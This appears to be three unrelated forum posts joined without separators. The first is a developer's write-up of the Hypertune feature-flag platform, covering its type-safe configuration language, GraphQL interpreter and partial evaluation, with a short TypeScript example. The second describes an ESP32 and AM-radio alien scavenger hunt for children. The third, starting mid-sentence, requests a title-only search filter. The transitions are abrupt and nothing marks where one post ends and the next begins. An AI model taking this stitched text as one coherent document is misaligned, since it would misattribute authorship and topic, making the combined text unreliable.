For example, compared specifically to other feature flag platforms, you get auto-generated type-safe code to catch flag typos and errors at compile-time (instead of run-time), code completion and "find all references" in your IDE (no figuring out if a flag is in kebab-case or camelCase), type-safe enum flags you can exhaustively switch on, type-safe object and list flags, and a type-safe logic UI. You pass context arguments like userId, email, etc, in a type-safe way too with compiler errors if you miss or misspell one. To clean up a flag, you remove it from your query, re-run code generation and fix all the type errors to remove all references. The full programming language under the hood means there are no limits on your flag logic (you're not locked into basic disjunctive normal form). You can embed a build-time snapshot of your flag logic in your app bundle for guaranteed, instant initialization with no network latency (and keep this up to date with a commit webhook). And all your flags are versioned together in a single Git history for instant rollbacks to known good states (no figuring out what combination of flag changes caused an incident).
There are other flexible configuration languages like Dhall (discussed here: https://news.ycombinator.com/item?id=32102203), Jsonnet (discussed here: https://news.ycombinator.com/item?id=19656821) and Cue (discussed here: https://news.ycombinator.com/item?id=20847943). But they lack a UI for nontechnical users, can't be updated at run-time and don't support analytics, A/B testing and ML.
I was actually going to start with a basic language that had primitives (Boolean, Int, String), a Comparison expression and an If / Else. Then users could implement the logic for each field in the schema separately.
But then I realized they might want to share logic for a group of fields at the object level, e.g. instead of repeating "if (deviceType == Mobile) { primitiveA } else { primitiveB }" for each primitive field separately, they could have the logic once at the Page level: "if (deviceType == Mobile) { pageObjectA } else { pageObjectB }". I also needed to represent field arguments like "deviceType" in the language. And I realized users may want to define other variables to reuse bits of logic, like a specific "benefit" which appears in different variations of the "benefits" list.
So at this point, it made sense to build a full, functional language with Object expressions (that have a type defined in the schema) and Function, Variable and Application expressions (to implement the lambda calculus). Then all the configuration can be represented as a single Object with the root Query type from the schema, e.g.
Query {
  page: f({ deviceType }) =>
    switch (true) {
      case (deviceType == DeviceType.Mobile) =>
        Page {
          headline: f({}) => "Headline A"
          imageUrl: f({}) => "Image A"
          showPromotion: f({}) => true
          benefits: f({}) => ["Ben", "efits", "A"]
        }
      default =>
        Page {
          headline: f({}) => "Headline B"
          imageUrl: f({}) => "Image B"
          showPromotion: f({}) => false
          benefits: f({}) => ["Ben", "efits", "B"]
        }
    }
}
So each schema field is implemented by a Function that takes a single Object parameter (a dictionary of field argument name => value). I needed to evaluate this logic tree given a GraphQL query that looks like:
query {
  page(deviceType: Mobile) {
    headline
    showPromotion
  }
}
So I built an interpreter that recursively selects the queried parts of the logic tree, evaluating the Functions for each query field with the given arguments. It ignores fields that aren't in the query so the logic tree can grow large without affecting query performance.
The interpreter is used by the SDK, to evaluate logic locally, and on our CDN edge server that hosts the GraphQL API. The response for the example above would be:
{
  "__typename": "Query",
  "page": {
    "__typename": "Page",
    "headline": "Headline A",
    "showPromotion": true
  }
}
Developers were concerned about using the SDK on the frontend as it could leak sensitive configuration logic, like lists of user IDs, to the browser.
To solve this, I modified the interpreter to support "partial evaluation". This is where it takes a GraphQL query that only provides some of the required field arguments and then partially evaluates the logic tree as much as possible. Any logic which can't be evaluated is left intact.
The SDK can leverage this at initialization time by passing already known arguments (e.g. the user ID) in its initialization query so that sensitive logic (like lists of user IDs) are evaluated (and eliminated) on the server. The rest of the logic is evaluated locally by the SDK when client code calls its methods with the remaining arguments. This also minimizes the payload size sent to the client and means less logic needs to be evaluated locally, which improves both page load and render performance.
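As a toy illustration of partial evaluation (not Hypertune's implementation): evaluate whatever the known arguments decide, and return the residual tree for everything else.

type Expr =
  | { kind: "lit"; value: string | boolean }
  | { kind: "arg"; name: string }
  | { kind: "if"; cond: Expr; then: Expr; else: Expr };

function partialEval(e: Expr, known: Record<string, string | boolean>): Expr {
  switch (e.kind) {
    case "lit":
      return e;
    case "arg": // substitute an argument if we know it, else leave it intact
      return e.name in known ? { kind: "lit", value: known[e.name] } : e;
    case "if": {
      const cond = partialEval(e.cond, known);
      if (cond.kind === "lit") // condition decided: the untaken branch
        return partialEval(cond.value ? e.then : e.else, known); // (e.g. a user-ID list) is eliminated
      return { kind: "if", cond, then: partialEval(e.then, known), else: partialEval(e.else, known) };
    }
  }
}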
The interpreter also keeps a count of expression evaluations as well as events for A/B tests and ML loops, which are flushed back to Hypertune in the background to overlay live analytics on the logic tree UI.
It's been a challenge to build a simple UI given there's a full functional language under the hood. For example, I needed to build a way for users to convert any expression into a variable in one click. Under the hood, to make expression X a variable, we wrap the parent of X in a Function that takes a single parameter, then wrap that Function in an Application that passes X as an argument. Then we replace X in the Function body with a reference to the parameter. So we go from:
if (X) {
  Y
} else {
  Z
}
to
((paramX) =>
  if (paramX) {
    Y
  } else {
    Z
  }
)(X)
So a variable is just an Application argument that can be referenced in the called Function's body. And once we have a variable, we can reference it in more than one place in the Function body. To undo this, users can "drop" a variable in one click which replaces all its references with a copy of its value.
Converting X into a variable gets more tricky if the parent of X is a Function itself which defines parameters referenced inside of X. In this case, when we make X a variable, we lift it outside of this Function. But then it doesn't have access to the Function's parameters anymore. So we automatically convert X into a Function itself which takes the parameters it needs. Then we call this new Function where we originally had X, passing in the original parameters. There are more interesting details about how we lift variables to higher scopes in one click but that's for another post.
Thanks for reading this far! I'm glad I got to share Hypertune with you. I'm curious about what use case appeals to you the most. Is it type-safe feature flags, in-app content management, A/B testing static Jamstack sites, managing permissions, pricing plans or something else? Please let me know any thoughts or questions!
It was based around ESP32 chips, Bluetooth devices, and old AM radios. I wrote a lot of ESP32 code for it, and it all took way too long to implement, but it was fun.
Before the hunt begins...
The idea was that it would be played in the local park at night. As we are driving to the park, I turn on the AM radio in the car. At a certain time, I push a Bluetooth LE button, which activates an ESP32 to play a sound clip over the car radio saying: "Emergency! We interrupt this broadcast - an alien spacecraft has crashed! You must find it and rescue the aliens!"
How the hunt works:
The kids are each given a Bluetooth BLE button to search for crashed UFO parts, aliens, and weird alien technology. The kids search the park with the BLE buttons, and when they are near a treasure, lights start flashing and alien messages are played through the AM radio. https://www.aliexpress.com/item/1005004985105723.html At each treasure location hidden in the dark there is an ESP32 connected to a string of LED lights cut from a Christmas tree light string, and also connected to an AM radio. The ESP32 runs a sketch using Neil Kolban's BLE scanner, searching for the device IDs of the BLE buttons. When the BLE buttons are in range of the hidden alien UFO parts (about 15 feet), the ESP32 blinks the LEDs and plays sci-fi audio clips using an AM radio signal generator: http://bitluni.net/am-radio-transmitter/
The missions:
The scavenger hunt starts in the middle of the park. I used an old briefcase, and inside it are six mission briefing envelopes. Each mission briefing envelope contains an audio greeting card playback device, on which I recorded a mission briefing for each of the treasure hunts described below. The audio playback devices are light sensitive, so they start playing their sound when they are pulled out of the mission envelopes: https://www.aliexpress.com/item/32930873811.html
Treasures to be found include:
Treasure #1 - 24 glow-in-the-dark aliens https://www.thepartycupboard.com.au/products/glow-in-the-dark-aliens Aliens are hidden throughout the park, their locations marked with these tiny individual battery-powered LEDs https://www.lightinthebox.com/en/p/6pcs-led-balloon-lights-mini-luminous-ballon-lamps-for-paper-lantern-bar-christmas-wedding-party-decoration_p7574222.html
Treasure #2 - https://www.aliexpress.com/item/1005004767224293.html flashing LED energy cubes. When the kids bring them back to base, they are dropped into a nuclear reactor's water (i.e. a bucket with water in it) and they activate, flashing. Radioactive UFO parts are covered with glow-in-the-dark sand https://www.aliexpress.com/item/1005004628971176.html
Treasure #3 - glow-in-the-dark spiders https://www.aliexpress.com/item/1005002863141919.html These are the enemies of the aliens and have followed them through space to Earth. The kids must capture the spiders, and must eat the spider eggs (round Jaffa orange chocolates) so the spiders don't breed any more.
Treasure #4 - helium balloons, which the aliens will use to return to their mothership in orbit. At the end of the treasure hunt the kids attach the aliens to helium balloons and return them to space by releasing the balloons.
At the end of the mission the kids have to drop all the treasures into an old rice cooker, which I told them was a nuclear reactor. I had put dry ice in it. Then they had to pour water on top, releasing clouds of mist from the reactor, strangely lit by the flashing ice-cube LEDs. This signalled that the kids should release the balloons carrying the little glow-in-the-dark aliens and battery-powered LEDs, sending the aliens back home and ending the adventure.
So I get those returned as well, effectively doubling the number of results, half of them irrelevant.
Current search filters only allow filtering by "Stories" or "Comments".
Desired solution: Add another filter "Title only" to exclude searching the OP post or comments for (partially) matching strings.
This seems simple to implement, and it would also be a big performance win, since the search space is at least an order of magnitude smaller, given that the actual posts/comments are much longer than titles.